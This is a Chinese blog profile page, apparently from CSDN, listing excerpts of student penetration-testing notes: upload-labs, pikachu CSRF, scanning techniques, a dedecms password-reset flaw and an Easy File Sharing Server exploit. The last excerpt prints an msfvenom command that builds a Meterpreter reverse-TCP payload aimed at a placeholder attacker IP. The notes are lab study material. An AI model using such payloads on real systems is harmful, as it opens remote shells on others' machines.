自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(9)
  • 收藏
  • 关注

原创 upload-labs

1、2、3、4、5、

2023-12-27 10:45:47 373 1

原创 easy file sharing server 漏洞利用和metasploit应用

用searchsploit easy file sharing 命令查看漏洞,漏洞对应利用脚本文件在/usr/share/exploitdb/exploits/windows/remote/下。msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击者ip lport=攻击者要开的端口。提示端口被占用,关闭靶机的iis,再打开easy file sharing server运行服务。-f format 指定有效载荷的形式。kali扫描靶机开放的服务情况。

2023-12-26 17:45:31 392 1

原创 pikach靶场记录

Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。pikachu中,CSRF(跨站请求伪造)概述。

2023-12-25 19:34:52 411

原创 主动扫描学习笔记

主动扫描即主动发送数据包给目标主机,根据返回的数据包的内容判断目标主机的一些情况(端口开放情况,是否在线,操作系统,开放了哪些服务)tcp建立了连接,速度慢,但是传输的内容不会丢失。ping,发送icmp echo消息,等待返回的icmp echo reply消息。B主机发送 SYN=1 ACK=1:ack=x+1:seq=y。A主机发送 ACK=1 seq=x+1 ack=y+1。syn扫描,判断端口开放,不留记录,需要管理员权限。fin扫描,判断操作系统,端口开放情况。

2023-12-25 11:55:45 375

原创 被动扫描笔记

123。

2023-12-24 20:56:24 381 1

原创 网络渗透实验1

因为刚删除的数据实际上在磁盘上并未被抹除,而是修改某个标志位告诉计算机这一部分可以被覆盖了,只要短时间内写入的数据不多,没有覆盖之前被删除的数据,是能够恢复近期删除的数据的。查看本机ip看到的是局域分配的私有地址,访问公网中的资源时私有ip经过NAT转换了ip地址和端口。可搜索指定组件,框架,设备,一些旧版本设备,使用旧版本框架的网站未及时更新可能会被不法分子发现,并利用漏洞入侵。说明其中四个端口的提供的服务,查阅资料,简要说明该服务的功能。8.3 尝试使用数据恢复软件恢复你的U盘中曾经删除的文件。

2023-12-23 22:24:18 816

原创 dedecms v5.7 sp2正式版前台用户随意修改密码漏洞复现

注册一个用户,密码随意,不设安全问题。id的值可进dede后台查看,

2023-12-12 19:58:30 25

原创 网络渗透作业3

利用zoomeye进行搜索。

2023-11-17 10:50:36 43

原创 网络渗透作业2

桥接模式就是将主机网卡与虚拟机的网卡利用虚拟网桥进行通信。在桥接的作用下,类似于把物理主机虚拟为一个交换机,所有桥接设置的虚拟机连接到这个交换机的一个接口上,物理主机也同样插在这个交换机当中,所以所有桥接下的网卡与网卡都是交换模式的,相互可以访问而不干扰。查看桥接模式下kali的ip。

2023-11-12 17:59:50 44 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除